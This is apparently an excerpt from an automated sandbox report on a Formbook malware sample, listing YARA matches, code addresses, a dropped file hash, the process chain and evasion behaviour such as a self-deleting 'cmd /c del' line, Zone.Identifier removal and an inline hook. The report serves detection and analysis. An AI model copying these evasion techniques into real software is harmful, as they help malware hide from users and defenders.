          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018022AE8_2_018022AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01730D208_2_01730D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018025DD8_2_018025DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802D078_2_01802D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E08_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801D558_2_01801D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017625818_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FD4668_2_017FD466
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174841F8_2_0174841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180DFCE8_2_0180DFCE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801FF18_2_01801FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01756E308_2_01756E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FD6168_2_017FD616
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802EF78_2_01802EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453841F15_2_0453841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E100215_2_045E1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B09015_2_0453B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A015_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F20A815_2_045F20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F1D5515_2_045F1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452F90015_2_0452F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04520D2015_2_04520D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454412015_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E015_2_0453D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455258115_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04546E3015_2_04546E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455EBB015_2_0455EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EE19715_2_001EE197
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2D9015_2_001D2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2D8715_2_001D2D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D9E3F15_2_001D9E3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D9E4015_2_001D9E40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EDF9715_2_001EDF97
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001D2FB015_2_001D2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001EDFAA15_2_001EDFAA
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0173B150 appears 35 times
          Source: BLESSINGS.exeBinary or memory string: OriginalFilename vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429031848.0000000005240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs BLESSINGS.exe
          Source: BLESSINGS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@3/1
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: BLESSINGS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BLESSINGS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: BLESSINGS.exeVirustotal: Detection: 45%
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Source: unknownProcess created: C:\Users\user\Desktop\BLESSINGS.exe 'C:\Users\user\Desktop\BLESSINGS.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: BLESSINGS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BLESSINGS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: BLESSINGS.exeStatic file information: File size 3427840 > 1048576
          Source: BLESSINGS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x344200
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454B71 push es; iretd 1_2_05455094
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05450A2A push ds; ret 1_2_05450A51
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054505E6 pushfd ; iretd 1_2_05450613
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05454E9A push es; iretd 1_2_05455094
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CEB5 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF6C push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF02 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041CF0B push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0178D0D1 push ecx; ret 8_2_0178D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0457D0D1 push ecx; ret 15_2_0457D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ED856 push esi; ret 15_2_001ED859
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECEB5 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF0B push eax; ret 15_2_001ECF72
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF02 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001ECF6C push eax; ret 15_2_001ECF72
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeFile opened: C:\Users\user\Desktop\BLESSINGS.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess information set: NOOPENFILEERRORBOX